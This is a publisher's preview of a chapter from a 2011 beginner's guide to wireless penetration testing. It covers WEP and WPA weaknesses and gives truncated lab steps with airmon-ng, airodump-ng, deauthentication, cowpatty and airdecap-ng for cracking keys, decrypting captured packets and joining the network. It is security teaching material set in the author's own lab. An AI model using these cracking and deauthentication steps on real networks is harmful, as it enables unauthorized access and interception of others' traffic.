Security
Reader small image

You're reading from  BackTrack 5 Wireless Penetration Testing Beginner's Guide

Product typeBook
Published inSep 2011
PublisherPackt
ISBN-139781849515580
Edition1st Edition
Tools
Backtrack
Concepts
Penetration Testing
Right arrow
Author (1)
Vivek Ramachandran
Vivek Ramachandran
author image
Vivek Ramachandran

Vivek Ramachandran has been working on Wi-Fi security since 2003. He discovered the Caffe Latte attack and also broke WEP Cloaking, a WEP protection schema, publicly in 2007 at DEF CON. In 2011, he was the first to demonstrate how malware could use Wi-Fi to create backdoors, worms, and even botnets. Earlier, Vivek was one of the programmers of the 802.1x protocol and Port Security in Cisco's 6500 Catalyst series of switches, and he was also one of the winners of the Microsoft Security Shootout contest held in India among a reported 65,000 participants. He is best known in the hacker community as the founder of SecurityTube.net, where he routinely posts videos on Wi-Fi security, assembly language, exploitation techniques, and so on. SecurityTube.net receives over 100,000 unique visitors a month. Vivek's work on wireless security has been quoted in BBC Online, InfoWorld, MacWorld, The Register, IT World Canada, and so on. This year, he will speak or train at a number of security conferences, including Blackhat, DEF CON, Hacktivity, 44con, HITB-ML, BruCON Derbycon, Hashdays, SecurityZone, and SecurityByte.
Read more about Vivek Ramachandran

Right arrow

Chapter 4. WLAN Encryption Flaws

Note

"640 K is more memory than anyone will ever need."

Bill Gates, Founder, Microsoft

Even with the best of intentions, the future is always unpredictable. The WLAN committee designed WEP and then WPA to be fool proof encryption mechanisms but over time, both these mechanism had flaws, which have been widely publicized and exploited in the real world.

WLAN encryption mechanisms have had a long history of being vulnerable to cryptographic attacks. It started with WEP in early 2000, which eventually was broken entirely. In recent times, attacks are slowly targeting WPA. Even though there is no public attack available currently to break WPA in all general conditions, there are attacks which are feasible under special circumstances.

In this chapter, we shall look at the following:

  • Different encryption schemas in WLANs

  • Cracking WEP encryption

  • Cracking WPA encryption

WLAN encryption

WLANs transmit data over the air and thus there is an inherent need to protect data confidentially. This is best done using encryption. The WLAN committee (IEEE 802.11) formulated the following protocols for data encryption:

  • Wired Equivalent Privacy (WEP )

  • WiFi Protected Access (WPA )

  • WiFi Protection Access v2 (WPAv2 )

Here, we will look at each of these encryption protocols and demonstrate various attacks against them.

WEP encryption

The WEP protocol was known to be flawed as early as 2000, but surprisingly it is still continuing to be used and the access points still ship with WEP-enabled capabilities.

There are many cryptographic weaknesses in WEP and they were discovered by Walker, Arbaugh, Fluhrer, Martin, Shamir, KoreK, and many others. Evaluation of WEP from a cryptographic standpoint is beyond the scope of this book, as it involves understanding complex math. Here, we will look at how to break WEP encryption using readily available tools on the BackTrack platform. This includes the entire Aircrack-Ng suite of tools—airmon-ng , aireplay-ng , airodump-ng , aircrack-ng , and others.

Let us now first set up WEP in our test lab and see how we can break it.

Time for action – cracking WEP

Follow the given instructions to get started:

  1. Let us first connect to our access point Wireless Lab and go to the settings area that deals with Wireless Encryption mechanisms:

  2. On my access point, this can be done by setting the Security Mode to WEP. We will also need to set the WEP key length. As shown in the following screenshot, I have set WEP to use 128 bit keys. I have set the Default WEP Key to WEP Key 1 and have set the value in hex to abcdefabcdefabcdefabcdef12 as the 128 bit WEP key. You can set this to whatever you choose:

  3. Once the settings are applied, the access point should now be offering WEP as the encryption mechanism of choice. Let us now set up the attacker machine.

  4. Let us bring up Wlan0 by issuing the command ifconfig wlan0 up. Then we will run airmon-ng start wlan0 to create mon0, the monitor mode interface, as shown in the following screenshot. Verify the mon0 interface has been created using iwconfig command:

  5. Let's run airodump-ng to locate...

WPA/WPA2

WPA (or WPA v1 as it is referred to sometimes) primarily uses the TKIP encryption algorithm. TKIP was aimed at improving WEP, without requiring completely new hardware to run it. WPA2 in contrast mandatorily uses the AES-CCMP algorithm for encryption, which is much more powerful and robust than TKIP.

Both WPA and WPA2 allow for either EAP-based authentication, using Radius servers (Enterprise) or a Pre-Shared Key (PSK) (Personal)-based authentication schema.

WPA/WPA2 PSK is vulnerable to a dictionary attack. The inputs required for this attack are the four-way WPA handshake between client and access point, and a wordlist containing common passphrases. Then, using tools like Aircrack-ng, we can try to crack the WPA/WPA2 PSK passphrase.

An illustration of the four-way handshake is shown in the following screenshot:

The way WPA/WPA2 PSK works is that, it derives the per-sessions key called Pairwise Transient Key (PTK), using the Pre-Shared Key and five other parameters—SSID of Network...

Time for action – cracking WPA-PSK weak passphrase

Follow the given instructions to get started:

  1. Let us first connect to our access point Wireless Lab and set the access point to use WPA-PSK. We will set the WPA-PSK passphrase to abcdefgh, so that it is vulnerable to a dictionary attack:

  2. We start airodump-ng with the command airodump-ng –bssid 00:21:91:D2:8E:25 –channel 11 –write WPACrackingDemo mon0, so that it starts capturing and storing all packets for our network:

  3. Now we can wait for a new client to connect to the access point, so that we can capture the four-way WPA handshake or we can send a broadcast de-authentication packet to force clients to reconnect. We do the latter to speed things up:

  4. As soon as we capture a WPA handshake, airodump-ng will indicate it on the top-right corner of the screen with a WPA Handshake: followed by the access point's BSSID:

  5. We can stop airodump-ng now. Let's open up the cap file in Wireshark and view the four-way handshake. Your Wireshark terminal should...

Speeding up WPA/WPA2 PSK cracking

We have already seen in the previous section that if we have the correct passphrase in our dictionary, cracking WPA-Personal will work everytime like a charm. So why we don't just create a large elaborate dictionary of millions of common passwords and phrases people use? This would help us a lot and most of the time, we would end up cracking the passphrase. It all sounds great, but we are missing one key component here—time taken. One of the more CPU and time-consuming calculations is that of the Pre-Shared Key using the PSK passphrase and the SSID through the PBKDF2. This function hashes the combination of both over 4,096 times before outputting the 256 bit Pre-Shared Key. The next step of cracking involves using this key along with parameters in the four-way handshake and verifying against the MIC in the handshake. This step is computationally inexpensive. Also, the parameters will vary in the handshake everytime and hence, this step cannot be pre-computed...

Time for action – speeding up the cracking process

  1. We can pre-calculate the PMK for a given SSID and wordlist using the genpmk tool with the command genpmk –f /pentest/passwords/wordlists/darkc0de.lst –d PMK-Wireless-Lab –s "Wireless Lab" as shown in the following screenshot. This creates the file PMK-Wireless-Lab that contains the pre-generated PMK:

  2. We now create a WPA-PSK network with the passphrase sky sign (present in the dictionary we used) and capture a WPA-handshake for that network. We now use Cowpatty to crack the WPA passphrase as shown in the following screenshot:

  3. It takes approximately 7.18 seconds for Cowpatty to crack the key, using the pre-calculated PMKs as shown in the screenshot:

  4. We now use aircrack-ng with the same dictionary file and the cracking process takes over 22 minutes. This shows how much we are gaining because of the pre-calculation:

  5. In order to use these PMKs with aircrack-ng, we need to use a tool called airolib-ng. We will give it the options airolib-ng PMK-Aircrack...

Decrypting WEP and WPA packets

In all the exercises, we have done till now, we have cracked WEP and WPA keys using various techniques. But what do we do with this information? The first step would be to decrypt data packets, we have captured using these keys.

In the next exercise, we will decrypt the WEP and WPA packets in the same trace file that we captured over the air, using the keys we cracked.

Time for action – decrypting WEP and WPA packets

  1. We will decrypt packets from the same WEP capture file, we created earlier WEPCrackingDemo-01.cap. For this, we will use another tool in the Aircrack-ng suite called Airdecap-ng. We run the following command as shown in the following screenshot: airdecap-ng -w abcdefabcdefabcdefabcdef12 WEPCrackingDemo-01.cap, using the WEP key we cracked previously:

  2. The decypted files are stored in a file named WEPCrackingDemo-01-dec.cap. We use the tshark utility to view the first ten packets in the file. Please note that, you may see something different based on what you captured:

  3. WPA/WPA2 PSK would work in exactly the same way as with WEP using the airdecap-ng utility as shown in the following figure, with the airdecap-ng –p abdefgh WPACrackingDemo-01.cap –e "Wireless Lab" command:

What just happened?

We just saw, how we can decrypt WEP and WPA/WPA2-PSK encrypted packets using Airdecap-ng. It is interesting to note, that we can do the same using Wireshark...

Connecting to WEP and WPA networks

We can also connect to the authorized network after we have cracked the network key. This can come in handy, during penetration testing. Logging onto the authorized network with the cracked key is the ultimate proof you can provide your client that his network is insecure.

Time for action – connecting to a WEP network

  1. Use the iwconfig utility to connect to a WEP network, once you have the key. In a past exercise, we broke the WEP key—abcdefabcdefabcdefabcdef12:

What just happened?

We saw how to connect to a WEP network.

Time for action – connecting to a WPA network

  1. In the case of WPA, the matter is a bit more complicated. The iwconfig utility cannot be used with WPA/WPA2 Personal and Enterprise, as it does not support it. We will use a new tool called WPA_supplicant , for this lab. To use WPA_supplicant for a network, we will need to create a configuration file as shown in the screenshot. We will name this file wpa-supp.conf:

  2. We will then invoke the WPA_supplicant utility with the following options -Dwext -iwlan0 –c wpa-supp.conf to connect to the WPA network, we just cracked as shown. Once the connection is successful, WPA_supplicant will give you a message Connection to XXXX completed:

  3. For both the WEP and WPA networks, once you are connected, you want to use Dhcpclient3 to grab a DHCP address from the network as shown next:

What just happened?

The default Wi-Fi utility iwconfig cannot be used to connect to WPA/WPA2 networks. The de-facto tool for this is WPA_Supplicant. In this lab, we saw how we can...

Summary

In this chapter, we have learnt the following about WLAN encryption:

  • WEP is flawed and no matter what the WEP key is, with enough data packet samples it is always possible to crack WEP.

  • WPA/WPA2 is cryptographically un-crackable currently, however, under special circumstances, such as when a weak passphrase is chosen in WPA/WPA2-PSK, it is possible to retrieve the passphrase using dictionary attacks.

  • In the next chapter, we will look at different attacks on the WLAN Infrastructure, such as rogue access points, evil twins, bit flipping attacks, and so on.

lock icon
The rest of the chapter is locked
Previous Chapter
Chapter 10 of 18
Next Chapter
You have been reading a chapter from
BackTrack 5 Wireless Penetration Testing Beginner's Guide
Published in: Sep 2011Publisher: PacktISBN-13: 9781849515580
© 2011 Packt Publishing Limited All Rights Reserved
Register for a free Packt account to unlock a world of extra content!
A free Packt account unlocks extra newsletters, articles, discounted offers, and much more. Start advancing your knowledge today.
Sign up now
undefined
Unlock this book and the full library FREE for 7 days
Get unlimited access to 7000+ expert-authored eBooks and videos courses covering every tech area you can think of
Start free trial
Renews at $15.99/month. Cancel anytime

Author (1)

author image
Vivek Ramachandran

Vivek Ramachandran has been working on Wi-Fi security since 2003. He discovered the Caffe Latte attack and also broke WEP Cloaking, a WEP protection schema, publicly in 2007 at DEF CON. In 2011, he was the first to demonstrate how malware could use Wi-Fi to create backdoors, worms, and even botnets. Earlier, Vivek was one of the programmers of the 802.1x protocol and Port Security in Cisco's 6500 Catalyst series of switches, and he was also one of the winners of the Microsoft Security Shootout contest held in India among a reported 65,000 participants. He is best known in the hacker community as the founder of SecurityTube.net, where he routinely posts videos on Wi-Fi security, assembly language, exploitation techniques, and so on. SecurityTube.net receives over 100,000 unique visitors a month. Vivek's work on wireless security has been quoted in BBC Online, InfoWorld, MacWorld, The Register, IT World Canada, and so on. This year, he will speak or train at a number of security conferences, including Blackhat, DEF CON, Hacktivity, 44con, HITB-ML, BruCON Derbycon, Hashdays, SecurityZone, and SecurityByte.
Read more about Vivek Ramachandran

Personalised recommendations for you

Based on your interests and search pattern

Attacking and Exploiting Modern Web Applications

Attacking and Exploiting Modern Web Applications

Attacking and Exploiting Modern Web Attacks will help you understand how to identify attack surfaces and detect vulnerabilities. This book takes a hands-on approach to implementation and associated methodologies and equips you with the knowledge and skills needed to effectively combat web attacks.

BookAug 2023338 pages
Automotive Cybersecurity Engineering Handbook

Automotive Cybersecurity Engineering Handbook

This Automotive Cybersecurity Engineering Handbook untangles the complexities of building secure automotive products and helps you to comply with cybersecurity standards. It provides practical tools, tips, and techniques coupled with real-world examples to enable you to create cyber-resilient automotive products with ease.

BookOct 2023392 pages
Official Google Cloud Certified Professional Cloud Security Engineer Exam Guide

Official Google Cloud Certified Professional Cloud Security Engineer Exam Guide

This book will help you to design, develop, and operate security controls on Google Cloud as well as discover best practices for relevant security domains, including identity and access management, network, and data.

BookAug 2023496 pages
Cloud Penetration Testing for Red Teamers

Cloud Penetration Testing for Red Teamers

The advent of cloud networks and the AWS, Azure, and GCP platforms has revolutionized how companies of all sizes in all industries do business online. This book will help you meet the emerging demand for pentesting as it guides you through the tools, techniques, and security measures used by pentesters and red teamers in the 2020s and beyond.

BookNov 2023298 pages
ISACA Certified in Risk and Information Systems Control (CRISC®) Exam Guide

ISACA Certified in Risk and Information Systems Control (CRISC®) Exam Guide

ISACA Certified in Risk and Information Systems Control (CRISC®) Certification Guide is an enterprise IT risk management professional’s dream. With its in-depth approach and various self-assessment exercises, this book arms you with knowledge of every single aspect of the certification, and is a fantastic career companion after you’re certified.

BookSep 2023316 pages5
Burp Suite Cookbook

Burp Suite Cookbook

Burp Suite is an immensely powerful and popular tool for web application security testing. This book provides a collection of recipes that address vulnerabilities in web applications and APIs. It offers guidance on how to configure Burp Suite, make the most of its tools, and explore into its extensions.

BookOct 2023450 pages
Building and Automating Penetration Testing Labs in the Cloud

Building and Automating Penetration Testing Labs in the Cloud

This hands-on guide will help you design and build a variety of penetration testing labs that mimic modern cloud environments running on AWS, Azure, and GCP. In addition to these, you will explore a number of practical strategies on how to manage the complexity, cost, and security risks involved when setting up vulnerable cloud lab environments.

BookOct 2023562 pages
Ethical Hacking Workshop

Ethical Hacking Workshop

As cyber-attacks grow and APT groups advance their skillset, you need to be able to protect your enterprise against cyber-attacks. In order to limit your attack surface, you need to ensure that you leverage the same skills and tools that an adversary may use to hack your environment and discover the security gaps. This book will teach you how to think like a hacker, use state-of-the-art hacking tools, and protect yourself and your organizaiton.

BookOct 2023220 pages
Windows Forensics Analyst Field Guide

Windows Forensics Analyst Field Guide

This book contains step-by-step processes to guide you in any investigation related to Windows OS. You’ll find out how to acquire evidence using multiple tools as well as examine and analyze the collected artifacts, while discovering multiple techniques used in real-world forensic incidents.

BookOct 2023318 pages
Implementing DevSecOps Practices

Implementing DevSecOps Practices

This book is a comprehensive, hands-on guide for individuals new to DevSecOps who want to implement DevSecOps practices successfully and efficiently. With its help, you’ll be able to shift security toward the left, enabling you to merge security into coding in no time.

BookDec 2023258 pages